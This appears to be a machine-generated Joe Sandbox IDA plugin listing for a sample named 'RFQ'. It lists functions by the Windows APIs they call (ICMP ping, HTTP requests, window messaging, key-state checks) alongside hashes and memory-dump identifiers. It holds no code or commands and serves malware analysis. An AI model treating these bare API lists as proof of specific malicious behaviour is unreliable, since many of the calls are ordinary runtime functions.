                                                                                                                                                    • Opcode Fuzzy Hash: 045edf75e5e86060046bb6b9a9f30f5fe2554dff82d0441efc67d8625b1d11f1
                                                                                                                                                    • Instruction Fuzzy Hash: E261A070648301EFE720EF54C849F6AB7E8AF48714F10491AFA859B291D778ED44CB93
                                                                                                                                                    APIs
                                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00788168
                                                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 007881AD
                                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 007881B9
                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 007881C7
                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00788237
                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0078824D
                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007882C2
                                                                                                                                                    • WSACleanup.WSOCK32 ref: 007882C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                    • String ID: Ping
                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                    • Opcode ID: 4a78ea5345c8bfff99154630dc1b236ca90eb240f07ec6587c4f4b72a8975b94
                                                                                                                                                    • Instruction ID: 779fb0a7140f91c318ed94d4d800c0aa4015411d0016c2ca78f0e608d5c3ac10
                                                                                                                                                    • Opcode Fuzzy Hash: 4a78ea5345c8bfff99154630dc1b236ca90eb240f07ec6587c4f4b72a8975b94
                                                                                                                                                    • Instruction Fuzzy Hash: 47519F316446049FD761AF24CC89F6AB7E4BF48320F448929FA55DB2A1DF78ED01CB42
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0077E396
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0077E40C
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0077E416
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0077E483
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                    • Opcode ID: 9d4db19e0d5ad6db43ac53d6e1bf9850a6c43df0e71d17adacf4174e85e032e9
                                                                                                                                                    • Instruction ID: f7ce6f7cc8f60c28aee129c4e27407b1ddc54a448eab2ccc39b13be98d73db47
                                                                                                                                                    • Opcode Fuzzy Hash: 9d4db19e0d5ad6db43ac53d6e1bf9850a6c43df0e71d17adacf4174e85e032e9
                                                                                                                                                    • Instruction Fuzzy Hash: CB318175A00249EFDF11EB68C849EADB7B8EF0C344F14C0A5F509AB292D678DA01CB91
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0076B98C
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 0076B997
                                                                                                                                                    • GetParent.USER32 ref: 0076B9B3
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0076B9B6
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0076B9BF
                                                                                                                                                    • GetParent.USER32(?), ref: 0076B9DB
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0076B9DE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1383977212-1403004172
                                                                                                                                                    • Opcode ID: 7a2220549e66adbb508c7271027fa99b2db5724e112dc57e8ed70de187e2d8f3
                                                                                                                                                    • Instruction ID: 65782baffae4edad500bf886bdcffda6214df79f1dc3bf5d5cd92dd247d770b5
                                                                                                                                                    • Opcode Fuzzy Hash: 7a2220549e66adbb508c7271027fa99b2db5724e112dc57e8ed70de187e2d8f3
                                                                                                                                                    • Instruction Fuzzy Hash: 0E21A4B4A00204EFDB05ABA4CC95EFEB775EF4A300F104115F952A3292DB7D58569B24
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0076BA73
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 0076BA7E
                                                                                                                                                    • GetParent.USER32 ref: 0076BA9A
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0076BA9D
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0076BAA6
                                                                                                                                                    • GetParent.USER32(?), ref: 0076BAC2
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0076BAC5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1383977212-1403004172
                                                                                                                                                    • Opcode ID: a2a37dfccad6c7bc4d72803c10e6fed1df8a5956367e2ac98ac6651a52242547
                                                                                                                                                    • Instruction ID: ab3cc73e42a27749f7d6ded1503008d5474be6ecf2e91cd7dbd603061c1fa387
                                                                                                                                                    • Opcode Fuzzy Hash: a2a37dfccad6c7bc4d72803c10e6fed1df8a5956367e2ac98ac6651a52242547
                                                                                                                                                    • Instruction Fuzzy Hash: A421B3B4A40108BFDB11ABA4CC85FFEB779EF49300F108115F952E3192EB7D59599B24
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32 ref: 0076BAE3
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0076BAF8
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076BB0A
                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0076BB85
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                                    • Opcode ID: 62d108063e562abc9e1f517958db975081d0f4122312122b172025b31cb651a5
                                                                                                                                                    • Instruction ID: 78736418115a62532ac352d2d8f0fe5bcf66c840710549b413b367222decfcf3
                                                                                                                                                    • Opcode Fuzzy Hash: 62d108063e562abc9e1f517958db975081d0f4122312122b172025b31cb651a5
                                                                                                                                                    • Instruction Fuzzy Hash: 851136F6608343F9FA206635EC0BDE6379D8B16324B204036FD0AE00D6FFAD6CA14554
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0078B2D5
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0078B302
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0078B30C
                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0078B40C
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0078B539
                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0078B56D
                                                                                                                                                    • CoGetObject.OLE32(?,00000000,007BD91C,?), ref: 0078B590
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0078B5A3
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0078B623
                                                                                                                                                    • VariantClear.OLEAUT32(007BD91C), ref: 0078B633
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2395222682-0
                                                                                                                                                    • Opcode ID: 43719bcd4343a6aa8ede2462382f1df39bb4c1ab3355a14441222357840bfec1
                                                                                                                                                    • Instruction ID: 02184ca3f8bbfd31fe5590c3c3b17db3fa93c8bc4489b95c3efe4b4fe4a50c46
                                                                                                                                                    • Opcode Fuzzy Hash: 43719bcd4343a6aa8ede2462382f1df39bb4c1ab3355a14441222357840bfec1
                                                                                                                                                    • Instruction Fuzzy Hash: 79C113B1608305AFD710EF64C884A2BB7E9FF88304F00491DF98A9B251DB79ED05CB52
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0075ACC1
                                                                                                                                                      • Part of subcall function 00757CF4: __mtinitlocknum.LIBCMT ref: 00757D06
                                                                                                                                                      • Part of subcall function 00757CF4: EnterCriticalSection.KERNEL32(00000000,?,00757ADD,0000000D), ref: 00757D1F
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0075ACD2
                                                                                                                                                      • Part of subcall function 00756986: __calloc_impl.LIBCMT ref: 00756995
                                                                                                                                                      • Part of subcall function 00756986: Sleep.KERNEL32(00000000,000003BC,0074F507,?,0000000E), ref: 007569AC
                                                                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0075ACED
                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,007E6E28,00000064,00755E91,007E6C70,00000014), ref: 0075AD46
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0075AD91
                                                                                                                                                    • GetFileType.KERNEL32(00000001), ref: 0075ADD8
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0075AE11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1426640281-0
                                                                                                                                                    • Opcode ID: 6d458c507cc7c979b90d157fa7bdab5555998a0266c66afd6279c1ee5ee3afc5
                                                                                                                                                    • Instruction ID: d8587184d68ab8741e2fe4eab4e0f88ae4133e23e9f17eb69ec14458c07c1bd6
                                                                                                                                                    • Opcode Fuzzy Hash: 6d458c507cc7c979b90d157fa7bdab5555998a0266c66afd6279c1ee5ee3afc5
                                                                                                                                                    • Instruction Fuzzy Hash: DB81F2709053459FDB24CF68C8455E9BBF0AF09322B24836DD8A6AB3D2D7BC9807CB55
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00774047
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007730A5,?,00000001), ref: 0077405B
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00774062
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007730A5,?,00000001), ref: 00774071
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00774083
                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007730A5,?,00000001), ref: 0077409C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007730A5,?,00000001), ref: 007740AE
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007730A5,?,00000001), ref: 007740F3
                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007730A5,?,00000001), ref: 00774108
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007730A5,?,00000001), ref: 00774113
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                    • Opcode ID: 29e73897091edcd20a3bf00646cec48e0e7584c21cc170a82b2af45722b6d487
                                                                                                                                                    • Instruction ID: 3f6274aaa73b7fad464c719f1409f22f910f17e8a2f70f029c68df44ca483caf
                                                                                                                                                    • Opcode Fuzzy Hash: 29e73897091edcd20a3bf00646cec48e0e7584c21cc170a82b2af45722b6d487
                                                                                                                                                    • Instruction Fuzzy Hash: 6D318F75500208ABDF20EB68DC99F7977B9AB54391F11C205F908E6290EBBC9D80CF79
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0074B496
                                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0074B4A0
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0074B4B5
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0074B4BD
                                                                                                                                                    • GetClientRect.USER32(?), ref: 007ADD63
                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 007ADD7A
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 007ADD86
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 007ADD95
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007ADDA7
                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 007ADDC5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3430376129-0
                                                                                                                                                    • Opcode ID: ef5fcd77cc99427c74d4df7f4c40fc0da5eb208df7d8989acdc33d9e0d9e0c07
                                                                                                                                                    • Instruction ID: 3cba804b87ed1c47462376b0182093ba70601a0e1456391ddde2d3d534cbba7f
                                                                                                                                                    • Opcode Fuzzy Hash: ef5fcd77cc99427c74d4df7f4c40fc0da5eb208df7d8989acdc33d9e0d9e0c07
                                                                                                                                                    • Instruction Fuzzy Hash: 56117935500209EFDB316BA8EC08FE93B65EB05325F118721FA66950E2EB394D51DF24
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007330DC
• CoUninitialize.OLE32(?,00000000), ref: 00733181
• UnregisterHotKey.USER32(?), ref: 007332A9
• DestroyWindow.USER32(?), ref: 007A5079
• FreeLibrary.KERNEL32(?), ref: 007A50F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 007A5125
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: cdefc6002ee4cebbc6cb7273227c353e4fe38ef96445ac17d51e3d554eb68e04
• Instruction ID: 72f660f92cb79ed025d304944a0eed779777bace198eaf8e21474faf03a2da79
• Opcode Fuzzy Hash: cdefc6002ee4cebbc6cb7273227c353e4fe38ef96445ac17d51e3d554eb68e04
• Instruction Fuzzy Hash: 58912B74600106CFD729EF24C899F69F3A4FF15304F5482A9E50AA7263DB38AE66CF54
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 0074CC15
  • Part of subcall function 0074CCCD: GetClientRect.USER32(?,?), ref: 0074CCF6
  • Part of subcall function 0074CCCD: GetWindowRect.USER32(?,?), ref: 0074CD37
  • Part of subcall function 0074CCCD: ScreenToClient.USER32(?,?), ref: 0074CD5F
• GetDC.USER32 ref: 007AD137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007AD14A
• SelectObject.GDI32(00000000,00000000), ref: 007AD158
• SelectObject.GDI32(00000000,00000000), ref: 007AD16D
• ReleaseDC.USER32(?,00000000), ref: 007AD175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007AD200
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: e89c2c04cf4beea1bde6607bd4e43fb84544c858eff57accaf699c3526f29a0d
• Instruction ID: af8a62c15557f39f10192b53f840bda9df06c1957d5fefb371efa5c7af511072
• Opcode Fuzzy Hash: e89c2c04cf4beea1bde6607bd4e43fb84544c858eff57accaf699c3526f29a0d
• Instruction Fuzzy Hash: D071DF31400209DFCF318F64C885AAA3BB5FF8A354F148369ED569A6A6D7398C41DF60
APIs
  • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
  • Part of subcall function 0074B63C: GetCursorPos.USER32(000000FF), ref: 0074B64F
  • Part of subcall function 0074B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0074B66C
  • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000001), ref: 0074B691
  • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000002), ref: 0074B69F
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0079ED3C
• ImageList_EndDrag.COMCTL32 ref: 0079ED42
• ReleaseCapture.USER32 ref: 0079ED48
• SetWindowTextW.USER32(?,00000000), ref: 0079EDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0079EE03
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0079EEDC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: 2922aa1cd12b88539384bf44d9d19143aa21e4cc68205c4a62cfb349615bdaf4
• Instruction ID: dd7cabb2230fdf96ea757eaf300b0b0b499e1b6058fede27c403d35927182586
• Opcode Fuzzy Hash: 2922aa1cd12b88539384bf44d9d19143aa21e4cc68205c4a62cfb349615bdaf4
• Instruction Fuzzy Hash: 2A518A70204304EFEB10DF20DC9AF6A77E4FB88714F408A2DF595972A2DB789954CB52
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007845FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0078462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0078466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00784682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0078468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007846BF
• InternetCloseHandle.WININET(00000000), ref: 00784706
  • Part of subcall function 00785052: GetLastError.KERNEL32(?,?,007843CC,00000000,00000000,00000001), ref: 00785067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: 83ab6ac6f92b17505769019e2ba5d2d91bb1cefa5ae0d99b75934d2a7eb3fcd0
• Instruction ID: 760e4f2e4ab280a9b2a74d4ec5e96b03d11e0df8978c151377f3bfd2ef1c01f4
• Opcode Fuzzy Hash: 83ab6ac6f92b17505769019e2ba5d2d91bb1cefa5ae0d99b75934d2a7eb3fcd0
• Instruction Fuzzy Hash: 4E4173B1641206BFEB15AF50CC89FFB77ACFF09354F104116FA059A141EBB89D448BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,007CDC00), ref: 0078B715
